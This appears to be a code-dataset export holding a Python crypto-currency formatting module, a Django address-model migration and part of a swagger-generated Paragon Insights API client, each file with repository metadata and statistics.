| 41 | 61 | 0.932927 | 25 | 164 | 5.56 | 0.4 | 0.359712 | 0.323741 | 0.388489 | 0.640288 | 0.460432 | 0 | 0 | 0 | 0 | 0 | 0 | 0.036585 | 164 | 3 | 62 | 54.666667 | 0.879747 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
b42bc7948240fce681b31a02b2afcd04fd87436e | 18,838 | py | Python | multicurrency/crypto.py | fscm/multicurrency | 5eabdcbfbf427dcafe08d4d05cfce8c9348aeb91 | [
"MIT"
] | 2 | 2021-03-26T18:19:57.000Z | 2021-07-27T01:15:50.000Z | multicurrency/crypto.py | fscm/multicurrency | 5eabdcbfbf427dcafe08d4d05cfce8c9348aeb91 | [
"MIT"
] | null | null | null | multicurrency/crypto.py | fscm/multicurrency | 5eabdcbfbf427dcafe08d4d05cfce8c9348aeb91 | [
"MIT"
] | null | null | null | # -*- coding: UTF-8 -*-
#
# copyright: 2020-2022, Frederico Martins
# author: Frederico Martins <http://github.com/fscm>
# license: SPDX-License-Identifier: MIT
"""Crypto currency representation(s)."""
from decimal import Decimal
from typing import Optional, Union
from .currency import Currency
class EOS(Currency):
"""EOS currency representation.
Simple usage example:
>>> from multicurrency import EOS
>>> eos = EOS(
... amount=123456.789)
>>> print(eos)
ε123,456.7890
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
            currency representation. Defaults to 4.
decimal_sign (str, optional): Decimal symbol. Defaults to '.'.
grouping_places (int, optional): Number of digits for grouping.
            Defaults to 3.
grouping_sign (str, optional): Grouping symbol. Defaults to ','.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ''.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 4,
decimal_sign: Optional[str] = '.',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = ',',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '',
**other) -> 'EOS':
"""Class creator.
Returns:
EOS: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EOS',
numeric_code='0',
symbol='ε',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='ε',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
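# Illustrative sketch (uses only the constructor options documented above):
# a two-decimal, international (currency-code) rendering of an EOS amount:
#   print(EOS(amount=1234.5, decimal_places=2, international=True))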
class Ethereum(Currency):
"""Ethereum currency representation.
Simple usage example:
>>> from multicurrency import Ethereum
>>> ethereum = Ethereum(
... amount=123456.789)
>>> print(ethereum)
Ξ123,456.789000000000000000
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
            currency representation. Defaults to 18.
decimal_sign (str, optional): Decimal symbol. Defaults to '.'.
grouping_places (int, optional): Number of digits for grouping.
            Defaults to 3.
grouping_sign (str, optional): Grouping symbol. Defaults to ','.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ''.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 18,
decimal_sign: Optional[str] = '.',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = ',',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '',
**other) -> 'Ethereum':
"""Class creator.
Returns:
Ethereum: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='ETH',
numeric_code='0',
symbol='Ξ',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='Ξ',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class Bitcoin(Currency):
"""Bitcoin currency representation.
Simple usage example:
>>> from multicurrency import Bitcoin
>>> bitcoin = Bitcoin(
... amount=123456.789)
>>> print(bitcoin)
₿123,456.78900000
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
            currency representation. Defaults to 8.
decimal_sign (str, optional): Decimal symbol. Defaults to '.'.
grouping_places (int, optional): Number of digits for grouping.
            Defaults to 3.
grouping_sign (str, optional): Grouping symbol. Defaults to ','.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ''.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 8,
decimal_sign: Optional[str] = '.',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = ',',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '',
**other) -> 'Bitcoin':
"""Class creator.
Returns:
Bitcoin: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='XBT',
numeric_code='0',
symbol='₿',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='₿',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class StellarLumens(Currency):
"""Stellar Lumens currency representation.
Simple usage example:
>>> from multicurrency import StellarLumens
>>> stellar_lumens = StellarLumens(
... amount=123456.789)
>>> print(stellar_lumens)
*123,456.7890000
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
            currency representation. Defaults to 7.
decimal_sign (str, optional): Decimal symbol. Defaults to '.'.
grouping_places (int, optional): Number of digits for grouping.
            Defaults to 3.
grouping_sign (str, optional): Grouping symbol. Defaults to ','.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ''.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 7,
decimal_sign: Optional[str] = '.',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = ',',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '',
**other) -> 'StellarLumens':
"""Class creator.
Returns:
StellarLumens: new object.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='XLM',
numeric_code='0',
symbol='*',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='*',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class Monero(Currency):
"""Monero currency representation.
Simple usage example:
>>> from multicurrency import Monero
>>> monero = Monero(
... amount=123456.789)
>>> print(monero)
ɱ123,456.789000000000
For more details see `multicurrency.currency.Currency`.
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 12.
decimal_sign (str, optional): Decimal symbol. Defaults to '.'.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3.
grouping_sign (str, optional): Grouping symbol. Defaults to ','.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ''.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 12,
decimal_sign: Optional[str] = '.',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = ',',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '',
**other) -> 'Monero':
"""Class creator.
Returns:
Monero: new object.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='XMR',
numeric_code='0',
symbol='ɱ',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='ɱ',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class Ripple(Currency):
"""Ripple currency representation.
Simple usage example:
>>> from multicurrency import Ripple
>>> ripple = Ripple(
... amount=123456.789)
>>> print(ripple)
✕123,456.789000
For more details see `multicurrency.currency.Currency`.
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 6.
decimal_sign (str, optional): Decimal symbol. Defaults to '.'.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3.
grouping_sign (str, optional): Grouping symbol. Defaults to ','.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ''.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 6,
decimal_sign: Optional[str] = '.',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = ',',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '',
**other) -> 'Ripple':
"""Class creator.
Returns:
Ripple: new object.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='XRP',
numeric_code='0',
symbol='✕',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='✕',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class Tezos(Currency):
"""Tezos currency representation.
Simple usage example:
>>> from multicurrency import Tezos
>>> tezos = Tezos(
... amount=123456.789)
>>> print(tezos)
ꜩ123,456.789000
For more details see `multicurrency.currency.Currency`.
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 6.
decimal_sign (str, optional): Decimal symbol. Defaults to '.'.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3.
grouping_sign (str, optional): Grouping symbol. Defaults to ','.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ''.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 6,
decimal_sign: Optional[str] = '.',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = ',',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '',
**other) -> 'Tezos':
"""Class creator.
Returns:
Tezos: new object.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='XTZ',
numeric_code='0',
symbol='ꜩ',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='ꜩ',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class Zcash(Currency):
"""Zcash currency representation.
Simple usage example:
>>> from multicurrency import Zcash
>>> zcash = Zcash(
... amount=123456.789)
>>> print(zcash)
ⓩ123,456.78900000
For more details see `multicurrency.currency.Currency`.
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 8.
decimal_sign (str, optional): Decimal symbol. Defaults to '.'.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3.
grouping_sign (str, optional): Grouping symbol. Defaults to ','.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ''.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 8,
decimal_sign: Optional[str] = '.',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = ',',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '',
**other) -> 'Zcash':
"""Class creator.
Returns:
Zcash: new object.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='ZEC',
numeric_code='0',
symbol='ⓩ',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='ⓩ',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
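# A minimal usage sketch for the formatting keywords shared by the classes
# above (doctest-style; the exact rendering comes from
# `multicurrency.currency.Currency`, so the outputs shown assume its
# default formatter):
#
# >>> from multicurrency import Zcash
# >>> zec = Zcash(amount=0.5, decimal_places=2, symbol_separator=' ')
# >>> print(zec)
# ⓩ 0.50
#
# Passing international=True renders the value with the alpha code
# ('ZEC' here) instead of the 'ⓩ' symbol.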
| 35.409774 | 77 | 0.587961 | 1,856 | 18,838 | 5.803341 | 0.072737 | 0.051991 | 0.035651 | 0.028224 | 0.878934 | 0.878934 | 0.878934 | 0.878934 | 0.832142 | 0.832142 | 0 | 0.01879 | 0.316329 | 18,838 | 531 | 78 | 35.47646 | 0.816834 | 0.498673 | 0 | 0.792952 | 0 | 0 | 0.013925 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035242 | false | 0 | 0.013216 | 0 | 0.154185 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b43f5ba18bae1ae48d14d18d6b94da045b4caac5 | 5,017 | py | Python | data/migrations/0003_auto_20171022_0016.py | peachman05/Pwcrew | 6aa340a92ed5833c34f7d3d5c27b132ab413aebb | [
"MIT"
] | null | null | null | data/migrations/0003_auto_20171022_0016.py | peachman05/Pwcrew | 6aa340a92ed5833c34f7d3d5c27b132ab413aebb | [
"MIT"
] | 2 | 2020-02-12T00:20:27.000Z | 2020-06-05T18:05:39.000Z | data/migrations/0003_auto_20171022_0016.py | peachman05/Pwcrew | 6aa340a92ed5833c34f7d3d5c27b132ab413aebb | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-10-22 07:16
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('data', '0002_address_education_insignia_personalinfo_workinfo'),
]
operations = [
migrations.AddField(
model_name='address',
name='user',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='address',
name='district',
field=models.CharField(max_length=70, verbose_name='อำเภอ(ปัจจุบัน)'),
),
migrations.AlterField(
model_name='address',
name='district_regis',
field=models.CharField(max_length=70, verbose_name='อำเภอ(ตามทะเบียนบ้าน)'),
),
migrations.AlterField(
model_name='address',
name='lane',
field=models.CharField(max_length=40, verbose_name='ซอย(ปัจจุบัน)'),
),
migrations.AlterField(
model_name='address',
name='lane_regis',
field=models.CharField(max_length=40, verbose_name='ซอย(ตามทะเบียนบ้าน)'),
),
migrations.AlterField(
model_name='address',
name='number',
field=models.CharField(max_length=10, verbose_name='เลขที่(ปัจจุบัน)'),
),
migrations.AlterField(
model_name='address',
name='number_regis',
field=models.CharField(max_length=10, verbose_name='เลขที่(ตามทะเบียนบ้าน)'),
),
migrations.AlterField(
model_name='address',
name='phone_number',
field=models.CharField(max_length=20, verbose_name='เบอร์โทรบ้าน(ปัจจุบัน)'),
),
migrations.AlterField(
model_name='address',
name='phone_number_regis',
field=models.CharField(max_length=20, verbose_name='เบอร์โทรบ้าน(ตามทะเบียนบ้าน)'),
),
migrations.AlterField(
model_name='address',
name='postal_code',
field=models.IntegerField(default=0, verbose_name='รหัสไปรษณีย์(ปัจจุบัน)'),
),
migrations.AlterField(
model_name='address',
name='postal_code_regis',
field=models.IntegerField(default=0, verbose_name='รหัสไปรษณีย์(ตามทะเบียนบ้าน)'),
),
migrations.AlterField(
model_name='address',
name='province',
field=models.CharField(max_length=70, verbose_name='จังหวัด(ปัจจุบัน)'),
),
migrations.AlterField(
model_name='address',
name='province_regis',
field=models.CharField(max_length=70, verbose_name='จังหวัด(ตามทะเบียนบ้าน)'),
),
migrations.AlterField(
model_name='address',
name='road',
field=models.CharField(max_length=70, verbose_name='ถนน(ปัจจุบัน)'),
),
migrations.AlterField(
model_name='address',
name='road_regis',
field=models.CharField(max_length=70, verbose_name='ถนน(ตามทะเบียนบ้าน)'),
),
migrations.AlterField(
model_name='address',
name='smartphone_number',
field=models.CharField(max_length=20, verbose_name='เบอร์มือถือ(ปัจจุบัน)'),
),
migrations.AlterField(
model_name='address',
name='smartphone_number_regis',
field=models.CharField(max_length=20, verbose_name='เบอร์มือถือ(ตามทะเบียนบ้าน)'),
),
migrations.AlterField(
model_name='address',
name='sub_district',
field=models.CharField(max_length=70, verbose_name='ตำบล(ปัจจุบัน)'),
),
migrations.AlterField(
model_name='address',
name='sub_district_regis',
field=models.CharField(max_length=70, verbose_name='ตำบล(ตามทะเบียนบ้าน)'),
),
migrations.AlterField(
model_name='address',
name='village_name',
field=models.CharField(max_length=40, verbose_name='หมู่บ้าน(ปัจจุบัน)'),
),
migrations.AlterField(
model_name='address',
name='village_name_regis',
field=models.CharField(max_length=40, verbose_name='หมู่บ้าน(ตามทะเบียนบ้าน)'),
),
migrations.AlterField(
model_name='address',
name='village_no',
field=models.IntegerField(default=0, verbose_name='หมู่(ปัจจุบัน)'),
),
migrations.AlterField(
model_name='address',
name='village_no_regis',
field=models.IntegerField(default=0, verbose_name='หมู่(ตามทะเบียนบ้าน)'),
),
]
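# Applying this migration uses the standard Django CLI; the app label
# 'data' comes from the dependency list above, and the command shown is
# illustrative:
#
# python manage.py migrate data 0003
#
# Note that the AddField operation supplies default=1, so any existing
# Address rows are attached to the user with primary key 1 when the new
# foreign-key column is created.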
| 37.440299 | 121 | 0.581224 | 641 | 5,017 | 4.535101 | 0.168487 | 0.071207 | 0.126591 | 0.158239 | 0.843825 | 0.839009 | 0.839009 | 0.808394 | 0.781562 | 0.675611 | 0 | 0.017203 | 0.281642 | 5,017 | 133 | 122 | 37.721805 | 0.763596 | 0.013554 | 0 | 0.539683 | 1 | 0 | 0.188839 | 0.06389 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.031746 | 0 | 0.055556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
81ee3a5d95f09c7ead4d6b502cfa16d42c27331d | 39,125 | py | Python | lib/jnpr/healthbot/swagger/api/system_api.py | Juniper/healthbot-py-client | 49f0884b5d01ac8430aa7ed4c9acb4e7a2b717a6 | [
"Apache-2.0"
] | 10 | 2019-10-23T12:54:37.000Z | 2022-02-07T19:24:30.000Z | lib/jnpr/healthbot/swagger/api/system_api.py | Juniper/healthbot-py-client | 49f0884b5d01ac8430aa7ed4c9acb4e7a2b717a6 | [
"Apache-2.0"
] | 5 | 2019-09-30T04:29:25.000Z | 2022-02-16T12:21:06.000Z | lib/jnpr/healthbot/swagger/api/system_api.py | Juniper/healthbot-py-client | 49f0884b5d01ac8430aa7ed4c9acb4e7a2b717a6 | [
"Apache-2.0"
] | 4 | 2019-09-30T01:17:48.000Z | 2020-08-25T07:27:54.000Z | # coding: utf-8
"""
Paragon Insights APIs
API interface for PI application # noqa: E501
OpenAPI spec version: 4.0.0
Contact: healthbot-feedback@juniper.net
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from jnpr.healthbot.swagger.api_client import ApiClient
class SystemApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def generate_resource_dependencies(self, **kwargs): # noqa: E501
"""Resource dependencies # noqa: E501
Get resource dependency events. Internal API # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.generate_resource_dependencies(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str x_iam_token: authentication header object
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.generate_resource_dependencies_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.generate_resource_dependencies_with_http_info(**kwargs) # noqa: E501
return data
def generate_resource_dependencies_with_http_info(self, **kwargs): # noqa: E501
"""Resource dependencies # noqa: E501
Get resource dependency events. Internal API # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.generate_resource_dependencies_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str x_iam_token: authentication header object
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['x_iam_token'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method generate_resource_dependencies" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'x_iam_token' in params:
header_params['x-iam-token'] = params['x_iam_token'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'multipart/form-data']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/config/rca/generate-resource-dependencies', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def query_tsdb(self, db, device_group, device, **kwargs): # noqa: E501
"""TSDB query # noqa: E501
Query TSDB # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.query_tsdb(db, device_group, device, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str db: Name of the database. Multiple databases should be separated by ','. '*' can be used to specify all databases. (required)
:param str device_group: Name of the deviceGroup(s). Multiple device groups should be separated by ','. This can be used in combination with device, but is not mandatory. If device is given, the query will be executed only for those devices in the given device group; otherwise all devices in the group will be considered. Given devices apply to all given device-groups. (required)
:param str device: Name of the device. Multiple devices should be separated by ','. This should be used along with deviceGroup. Without deviceGroup, this config will not be considered. (required)
:param str measurement: Name of the measurement. Optional if topic/rule/trigger is used
:param str topic: Name of Healthbot topic. Optional if measurement is used
:param str rule: Name of Healthbot rule. Required if topic is used. Optional if measurement is used
:param str trigger: Name of Healthbot trigger. Optional if measurement is used or rule table is being queried
:param str fields: Fields that need to be retrieved. Use * to query all fields. Eg: fields=field1, field2
:param str order: Sort points in descending order based on time. By default points will be sorted in ascending order. Eg: order=desc
:param str group_by: Group results based on specified tags. Use * to group by all tags. Eg: groupBy=key1, key2
:param str limit: Limit number of points in the result. If groupBy is used limit is applied per group. Eg: limit=10
:param str where: Where clause filters data based on fields, tags, and/or timestamps. Eg: where=\"interface-name\" = 'ge-0/0/1' and \"in-pkts\" > 0
:param str q: Influx query string. Use this when the custom query format does not support a query
:return: TsdbResults
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.query_tsdb_with_http_info(db, device_group, device, **kwargs) # noqa: E501
else:
(data) = self.query_tsdb_with_http_info(db, device_group, device, **kwargs) # noqa: E501
return data
def query_tsdb_with_http_info(self, db, device_group, device, **kwargs): # noqa: E501
"""TSDB query # noqa: E501
Query TSDB # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.query_tsdb_with_http_info(db, device_group, device, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str db: Name of the database. Multiple databases should be separated by ','. '*' can be used to specify all databases. (required)
:param str device_group: Name of the deviceGroup(s). Multiple device groups should be separated by ','. This can be used in combination with device, but is not mandatory. If device is given, the query will be executed only for those devices in the given device group; otherwise all devices in the group will be considered. Given devices apply to all given device-groups. (required)
:param str device: Name of the device. Multiple devices should be separated by ','. This should be used along with deviceGroup. Without deviceGroup, this config will not be considered. (required)
:param str measurement: Name of the measurement. Optional if topic/rule/trigger is used
:param str topic: Name of Healthbot topic. Optional if measurement is used
:param str rule: Name of Healthbot rule. Required if topic is used. Optional if measurement is used
:param str trigger: Name of Healthbot trigger. Optional if measurement is used or rule table is being queried
:param str fields: Fields that need to be retrieved. Use * to query all fields. Eg: fields=field1, field2
:param str order: Sort points in descending order based on time. By default points will be sorted in ascending order. Eg: order=desc
:param str group_by: Group results based on specified tags. Use * to group by all tags. Eg: groupBy=key1, key2
:param str limit: Limit number of points in the result. If groupBy is used limit is applied per group. Eg: limit=10
:param str where: Where clause filters data based on fields, tags, and/or timestamps. Eg: where=\"interface-name\" = 'ge-0/0/1' and \"in-pkts\" > 0
:param str q: Influx query string. Use this when the custom query format does not support a query
:return: TsdbResults
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['db', 'device_group', 'device', 'measurement', 'topic', 'rule', 'trigger', 'fields', 'order', 'group_by', 'limit', 'where', 'q'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method query_tsdb" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'db' is set
if ('db' not in params or
params['db'] is None):
raise ValueError("Missing the required parameter `db` when calling `query_tsdb`") # noqa: E501
# verify the required parameter 'device_group' is set
if ('device_group' not in params or
params['device_group'] is None):
raise ValueError("Missing the required parameter `device_group` when calling `query_tsdb`") # noqa: E501
# verify the required parameter 'device' is set
if ('device' not in params or
params['device'] is None):
raise ValueError("Missing the required parameter `device` when calling `query_tsdb`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'db' in params:
query_params.append(('db', params['db'])) # noqa: E501
if 'device_group' in params:
query_params.append(('deviceGroup', params['device_group'])) # noqa: E501
if 'device' in params:
query_params.append(('device', params['device'])) # noqa: E501
if 'measurement' in params:
query_params.append(('measurement', params['measurement'])) # noqa: E501
if 'topic' in params:
query_params.append(('topic', params['topic'])) # noqa: E501
if 'rule' in params:
query_params.append(('rule', params['rule'])) # noqa: E501
if 'trigger' in params:
query_params.append(('trigger', params['trigger'])) # noqa: E501
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
if 'order' in params:
query_params.append(('order', params['order'])) # noqa: E501
if 'group_by' in params:
query_params.append(('groupBy', params['group_by'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'where' in params:
query_params.append(('where', params['where'])) # noqa: E501
if 'q' in params:
query_params.append(('q', params['q'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'multipart/form-data']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/tsdb/query', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TsdbResults', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
